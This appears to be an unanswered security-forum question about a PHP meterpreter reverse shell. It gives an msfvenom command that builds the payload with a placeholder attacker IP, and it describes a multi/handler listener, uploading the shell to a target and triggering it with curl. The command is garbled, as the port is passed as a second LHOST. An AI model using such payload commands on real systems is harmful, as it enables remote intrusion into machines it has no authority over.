1

I created a php reverse shell using msfvenom utility like:

msfvenom -p php/meterpreter/reverse_tcp LHOST=<MY_IP> LHOST=4444 -f raw > reverse_shell.php

And I created a listener using msfconsole using multi/handler. I uploaded the shell to the target machine and used curl to request the url of the uploaded shell but the listener is not showing any response. Any suggestions?

schroeder
  • 123,438
  • 55
  • 284
  • 319
Adnan Khan
  • 11
  • 1

0 Answers0